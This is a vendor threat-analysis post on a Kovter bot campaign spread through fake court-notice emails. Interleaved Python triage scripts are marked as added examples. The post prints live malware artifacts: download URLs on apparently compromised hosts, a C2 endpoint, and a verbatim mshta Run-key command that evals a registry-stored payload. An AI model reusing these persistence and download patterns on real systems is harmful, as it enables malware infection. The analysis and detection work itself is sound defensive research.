Kovter expanding bot through emails bearing ‘court notices’ – Performanta’s case study

Category: Threat Analysis

On the weekend of the 11th of July, a number of suspicious emails with the subject ‘Notice to Appear in Court’ were sent to some of our key employees. The messages purported to come from the ‘District Court’ and carried a ZIP attachment. Performanta Labs ran an initial analysis and confirmed the attachment was malicious; more rigorous analysis identified it as the Kovter ad-fraud bot, which also appeared to be spreading on the 10th of July via a malvertising campaign.

In the current threat landscape, where adversaries split their campaigns into small, scattered attacks in order to stay undetected for longer, it is becoming harder to tell a crimeware attack that uses a well-known bot from an attack that specifically targets your data. At first glance this looked like a targeted attack aimed at Performanta: the Kovter sample initially had a zero antivirus detection rate and kept a low detection rate in the following days (a common property of current malware), it used infection techniques such as ‘process hollowing’ (also seen in threats like Stuxnet), and it downloaded Microsoft PowerShell. As the line between crimeware and threats that target your data becomes blurrier, thorough analysis is paramount to gain context and understand a threat in detail.

At Performanta we specialise in professional services for an array of security products. We possess an acute understanding of the current threat landscape and believe targeted attacks to be a common property that may affect organisations of all sizes. We educate our customers in the same manner and believe that exposing this type of data is essential, as it can help raise awareness and education against the scourge of cybercrime.

In an attempt to raise awareness, this post includes some tangible information followed by indicators of compromise for this specific attack. We sincerely wish to educate the security community and help create context for anyone else who may have encountered this type of attack.

The Email Lure

The malicious emails were sent in the early hours of Saturday the 11th of July. Neither the subject of the emails (‘Notice to Appear in Court’) nor the body of the messages contained any obvious grammatical mistakes.

Inside the attached ZIP file was a JavaScript file with a double extension, ‘.doc.js’. The file name had the following format, where the X’s represent digits: Court_Notification_XXXXXXXX.doc.js

[Image: the lure email]

[Image: the JavaScript file inside the attached ZIP]

(The full text of the email message is included to help affected parties or researchers find this post via web search.)

Subject: Notice to Appear in Court

Notice to Appear,

This is to inform you to appear in the Court on the July 15 for your case hearing. Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

The copy of Court Notice is attached to this email.

Regards,
Jon Cross,
Clerk of Court.

Examining the file revealed obfuscated JavaScript that was clearly intended to evade detection (see the first image below). The obfuscated script held 229 functions, each returning a different fragment of code; the script called them in order to assemble a second layer of malicious code. After deobfuscating the code (third image below) the intent of the script became clear: it instantiates the WScript.Shell, MSXML2.XMLHTTP and ADODB.Stream COM objects in order to download an executable to the local machine (MSXML2.XMLHTTP fetches it and ADODB.Stream writes the binary to disk) and then runs it through the WScript.Shell object. The script itself is executed by the Microsoft Windows Script Host, wscript.exe, which resides under Windows\System32.

The script attempts to download a malicious executable from three different hosts that appear to be compromised websites. The files are saved to the %TEMP% folder under names consisting of digits only (for example 37845366.exe).
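The following Python script is an added example for offline triage of an attachment of this kind; it is not part of the original post and not Kovter’s code. It opens a ZIP, flags members whose name carries a decoy-plus-script double extension (such as .doc.js), and scans script members for the three COM objects, the document.php?rnd=&id= download URL shape and the digits-only %TEMP% executable name described above. The ZIP and the script body it contains are constructed here to stand in for the real attachment (the real script was obfuscated into 229 fragment-returning functions; the constructed one is only the handful of declarations the assembled second layer boils down to).

```python
# Added example (not from the original post): offline triage of a
# court-notice style ZIP attachment. The ZIP contents are constructed.
import io
import re
import zipfile

# Script extensions the Windows Script Host / mshta will execute.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}
# Extensions commonly used as the decoy half of a double extension.
DECOY_EXTS = {".doc", ".docx", ".pdf", ".txt", ".jpg", ".gif"}

# COM objects the deobfuscated script instantiates, the URL shape it
# requests, and the digits-only executable name it writes to %TEMP%.
COM_OBJECTS = ("wscript.shell", "msxml2.xmlhttp", "adodb.stream")
DOWNLOAD_URL = re.compile(r"document\.php\?rnd=\d+&id=[0-9A-Fa-f]+")
TEMP_EXE = re.compile(r"%TEMP%\\+\d+\.exe", re.IGNORECASE)


def double_extension(name):
    """Return (decoy, script) if name looks like X.doc.js, else None."""
    m = re.search(r"(\.[a-z0-9]{2,4})(\.[a-z0-9]{2,4})$", name.lower())
    if m and m.group(1) in DECOY_EXTS and m.group(2) in SCRIPT_EXTS:
        return m.group(1), m.group(2)
    return None


def script_indicators(text):
    """Collect the downloader indicators present in a script body."""
    lowered = text.lower()
    hits = [obj for obj in COM_OBJECTS if obj in lowered]
    hits += DOWNLOAD_URL.findall(text)
    hits += TEMP_EXE.findall(text)
    return hits


def triage_zip(zip_bytes):
    """Scan every member of a ZIP attachment; return [(name, reasons)]."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            reasons = []
            ext = double_extension(name)
            if ext:
                reasons.append("double extension %s%s" % ext)
            if name.lower().endswith(tuple(SCRIPT_EXTS)):
                body = zf.read(info).decode("latin-1", errors="replace")
                reasons += script_indicators(body)
            findings.append((name, reasons))
    return findings


# Constructed stand-in for the deobfuscated second layer: only the object
# declarations and the values the post describes, not a working downloader.
SAMPLE_SCRIPT = (
    'var sh = new ActiveXObject("WScript.Shell");\n'
    'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
    'var st = new ActiveXObject("ADODB.Stream");\n'
    'var url = "http://avolonage.com/document.php?rnd=3881'
    '&id=5556535E0D0A020B24140116020B1609050A10054A070B09";\n'
    'var out = "%TEMP%\\\\37845366.exe";\n'
)


def build_sample_zip():
    """Constructed attachment: the lure script plus a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Court_Notification_12345678.doc.js", SAMPLE_SCRIPT)
        zf.writestr("readme.txt", "nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in triage_zip(build_sample_zip()):
        print(member, "->", reasons or "clean")
```

Run it against a real attachment by replacing build_sample_zip() with the bytes of the ZIP; any member with a non-empty reason list deserves a detonation in a sandbox rather than a double click.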

The URL crafted by the script attempts to download the file from the following three websites:

  • avolonage.com
  • mrflapper.com
  • iconic.com.mx

The value of the stroke variable (seen at the top of the first image below) is used in the URL as the value of the id parameter, and the web server only returns the malicious file in response to it; this is done so that only the script, and not a researcher browsing to the URL, can retrieve the file. A simple detection-evasion technique was also spotted: the web server attempted to disguise the malicious executables as images by returning a file name with a .gif extension in the Content-Disposition HTTP response header (see the bottom image), even though the body of the response is a Windows executable.

Here are some examples of the URLs the script requests in order to download the malicious files:

avolonage.com/document.php?rnd=3881&id=5556535E0D0A020B24140116020B1609050A10054A070B09

mrflapper.com/document.php?rnd=2953&id=5556535E0D0A020B24140116020B1609050A10054A070B09

iconic.com.mx/document.php?rnd=2953&id=5556535E0D0A020B24140116020B1609050A10054A070B09
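The following Python script is an added example, not part of the original post, showing two checks a practitioner would run over traffic like the above: it extracts the rnd and id parameters from a document.php request so the download can be correlated with the script that generated it, and it compares the file name in a response’s Content-Disposition header with the magic bytes of the body, flagging a PE executable served under an image name. The HTTP response it parses is constructed; the URL is one of the infection URLs listed in this post.

```python
# Added example (not from the original post): spot an executable that the
# server disguises as an image, as Kovter's download hosts did.
import re
from urllib.parse import parse_qs, urlsplit

DOC_PHP = re.compile(r"/document\.php$")

# Leading bytes that identify the real file type regardless of its name.
MAGIC = {
    b"MZ": "exe",
    b"GIF8": "gif",
    b"\x89PNG": "png",
    b"\xff\xd8\xff": "jpg",
}


def parse_download_url(url):
    """Return host, rnd and id for a document.php request, else None."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    if not DOC_PHP.search(parts.path):
        return None
    qs = parse_qs(parts.query)
    return {
        "host": parts.hostname,
        "rnd": qs.get("rnd", [None])[0],
        "id": qs.get("id", [None])[0],
    }


def parse_response(raw):
    """Split a raw HTTP response into (status line, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body


def claimed_extension(headers):
    """Extension of the file name the server advertises, if any."""
    m = re.search(r'filename="?([^";]+)"?', headers.get("content-disposition", ""))
    if not m:
        return None
    pieces = m.group(1).rsplit(".", 1)
    return pieces[1].lower() if len(pieces) == 2 else None


def body_type(body):
    for magic, kind in MAGIC.items():
        if body.startswith(magic):
            return kind
    return "unknown"


def verdict(raw):
    """Compare what the server claims the file is with what it actually is."""
    _, headers, body = parse_response(raw)
    claimed = claimed_extension(headers)
    actual = body_type(body)
    if actual == "exe" and claimed != "exe":
        return "MISMATCH: PE executable served as .%s (Content-Type %s)" % (
            claimed, headers.get("content-type"))
    return "ok: %s" % actual


# Constructed response modelled on the evasion described in the post: an
# image/gif content type and a .gif file name wrapped around an MZ header.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: image/gif\r\n"
    b'Content-Disposition: attachment; filename="37845366.gif"\r\n'
    b"Content-Length: 64\r\n"
    b"\r\n"
    b"MZ\x90\x00" + b"\x00" * 60
)

if __name__ == "__main__":
    print(parse_download_url(
        "avolonage.com/document.php?rnd=3881"
        "&id=5556535E0D0A020B24140116020B1609050A10054A070B09"))
    print(verdict(SAMPLE_RESPONSE))
```

The same magic-byte comparison belongs in a proxy or mail gateway rule: a Content-Type or file name is whatever the attacker’s server chooses to send, whereas the first bytes of the body are not negotiable.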


[Image: obfuscated code]

[Image: obfuscated code, the decryption routine that assembles the second layer of malicious code]

[Image: deobfuscated code]

[Image: evasion attempt, the executable is reported by the web server as an image file]


Post Infection Activity – Utilising Windows PowerShell and downloading Flash Player

When the downloaded file is launched from the %TEMP% folder by Windows Script Host, the threat executes a legitimate Windows program under \Windows\System32 called dllhost.exe and then applies a technique known as ‘process hollowing’: a legitimate process is started, its original code is replaced in memory with malicious code, and the process is then resumed, so the malicious code runs under the name of the legitimate executable.

The threat then starts a second dllhost.exe process, which appears to act as a watchdog over the parent dllhost.exe process that serves as the main module. The threat ‘calls home’ and signals a successful infection to the Kovter command and control server by sending an HTTP POST with some data to 155.94.67.5/upload.php.

The folks at Malwarebytes observed a malvertising campaign that dropped Kovter on the 10th of July; that sample checks in to the same IP address, 155.94.67.5.

[Image: Kovter spread through a malvertising campaign and calling back home. Credit: Malwarebytes]

Kovter spawns several sub-processes to complete certain tasks and to remain persistent on the computer. In the initial infection stages, after hollowing the dllhost.exe process, it generates a random name made of letters only and creates a folder with that name under the logged-on user’s Local Settings\Application Data folder (normally \Documents and Settings\%username%\Local Settings\Application Data on Windows XP); it then copies itself into that folder, giving the copied executable the same random name as the folder. To survive a reboot, two auto-start values are created under the Run registry key, one for the current user and one for the local machine; the value name is empty (null), which some tools display as a pair of square brackets [ ].

The threat has also been seen using the Microsoft HTML Application host (mshta.exe) to auto-start from the Run key. Here is an example of what the registry value data looks like:

mshta javascript:bwliEDx7="Y9XfkLou";h7w=new%20ActiveXObject("WScript.Shell");seH4zcNQB="cN0sd";OWn3D=h7w.RegRead("HKLM\\software\\391691ad\\bb7bf441");umA2XZZqV6="q0FdMt";eval(OWn3D);nzDyV7KI="v"; 
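The following Python script is an added example, not part of the original post, that turns the two persistence traits above into checks an analyst can run over exported Run-key values and dropped-file paths: an empty value name, an mshta launch with an inline javascript: URL that reads its real payload out of a registry path and evals it (the script extracts that path so the second stage can be pulled for analysis), and the random-letters folder and executable pair under the per-user local application data folder. The Run-key contents below are constructed, except for the mshta value, which is the one quoted in this post.

```python
# Added example (not from the original post): triage of Run-key values and
# dropped-file paths for the persistence traits Kovter showed.
import re
from urllib.parse import unquote

# Value data that launches mshta with an inline javascript:/vbscript: URL ...
MSHTA_INLINE = re.compile(r"^\s*mshta(\.exe)?\s+(javascript|vbscript):", re.IGNORECASE)
# ... and reads the real payload back out of a registry path.
REGREAD = re.compile(r'RegRead\("([^"]+)"\)')
# <letters>\<same letters>.exe under the per-user local application data
# folder (XP layout and the Vista+ AppData\Local layout).
DROP_PATH = re.compile(
    r"(?:\\Local Settings\\Application Data|\\AppData\\Local)\\([a-z]+)\\\1\.exe$",
    re.IGNORECASE,
)


def inspect_run_value(name, data):
    """Return the reasons one Run value looks like Kovter persistence."""
    reasons = []
    if name == "":
        reasons.append("empty value name")
    decoded = unquote(data)  # the sample hides spaces as %20
    if MSHTA_INLINE.match(decoded):
        reasons.append("mshta with inline script")
        for path in REGREAD.findall(decoded):
            # the JavaScript string doubles the backslashes; undo that
            reasons.append("second stage read from %s" % path.replace("\\\\", "\\"))
        if "eval(" in decoded:
            reasons.append("eval of registry contents")
    if DROP_PATH.search(decoded):
        reasons.append("random-name folder/exe pair under local app data")
    return reasons


def scan_run_key(values):
    """values: {value name: value data} for one Run key; returns the hits."""
    hits = {}
    for name, data in values.items():
        reasons = inspect_run_value(name, data)
        if reasons:
            hits[name] = reasons
    return hits


# The mshta value quoted in the post (JavaScript escaping kept as stored).
MSHTA_VALUE = (
    'mshta javascript:bwliEDx7="Y9XfkLou";h7w=new%20ActiveXObject("WScript.Shell");'
    'seH4zcNQB="cN0sd";OWn3D=h7w.RegRead("HKLM\\\\software\\\\391691ad\\\\bb7bf441");'
    'umA2XZZqV6="q0FdMt";eval(OWn3D);nzDyV7KI="v";'
)
# Constructed: the copied executable in its random-name folder, and a
# benign auto-start entry for comparison.
DROPPED_EXE = r"C:\Documents and Settings\bob\Local Settings\Application Data\qwertyz\qwertyz.exe"
BENIGN = r'"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'

SAMPLE_RUN_KEY = {"": MSHTA_VALUE, "Updater": DROPPED_EXE, "OneDrive": BENIGN}

if __name__ == "__main__":
    for value_name, reasons in scan_run_key(SAMPLE_RUN_KEY).items():
        print(repr(value_name), "->", reasons)
```

Feed it the output of a registry export of both Run keys (HKCU and HKLM); the path reported by the RegRead check is where the encoded second stage lives, and exporting that key is the next step of the investigation.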

Following a successful infection, the threat starts polling a long list of IP addresses that appear to be part of the botnet (the IPs are listed in the Indicators of Compromise section at the bottom of this post). We examined the threat on Windows XP, and one of its more interesting traits is the download and silent installation of the Windows Management Framework from Microsoft’s website, followed by a framework update. A key component of that framework is PowerShell, an advanced command-line shell and scripting language that lets power users administer a machine locally or remotely; as such, it is considered a very effective post-exploitation utility, employed by penetration testers and criminals alike.

It was also observed that Kovter downloaded the latest version of Flash Player. A blog post by Kafeine suggested that the adversaries simply ‘patch’ security holes on the system to prevent infection by competing bots; the same post noted that Kovter probably also does this to maximise its revenue by displaying Flash video ads, which are more profitable than the usual simple pop-up ads.

[Image: post-infection traffic]

[Image: entries under the registry Run key for the local user and the local machine]

Summary

In this post we analysed what at first appeared to be a targeted attack, but which turned out to be a low-volume campaign to expand the well-known Kovter bot. This attack is a good reminder that low-volume attacks, whether or not they use known malware, are common and relevant to businesses of any size or industry vertical. The fact that Kovter affects businesses and uses powerful tools like PowerShell increases the risk of an infection, as it gives adversaries more options to expand their business model and harvest business data. We hope you found this post educational and that it gives more context about this attack.

Please feel free to share this post within your social community and help improve awareness and understanding. You could save a relative, friend or colleague from becoming an unsuspecting victim of such an attack.

Indicators of Compromise

Infection URLs:

avolonage.com/document.php?rnd=3881&id=5556535E0D0A020B24140116020B1609050A10054A070B09

mrflapper.com/document.php?rnd=2953&id=5556535E0D0A020B24140116020B1609050A10054A070B09

iconic.com.mx/document.php?rnd=2953&id=5556535E0D0A020B24140116020B1609050A10054A070B09

Initial File Hashes (for reference only; Kovter is polymorphic, so hashes change regularly):
SHA1: 28594191d330cdba4dad6700a1ea63f7ed60437c
SHA1: 16345198d772ca3cfb28c63fbfe04fb4813796b5

Registry Run values (empty value name, shown as [ ] by some tools):
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\[]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[]

Threat Local Files:
%USERPROFILE%\Local Settings\Application Data\<random-alphabetical-name>\<random-alphabetical-name.exe>

Legitimate Local Folders & Files (created by the Windows Management Framework installation):
%WINDIR%\system32\windowspowershell\
%WINDIR%\system32\winrm\
%WINDIR%\system32\WsmSvc.dll

Command and Control URL:
155.94.67.5/upload.php

Other network traffic initiated by Kovter (not confirmed as malicious):
Pastebin link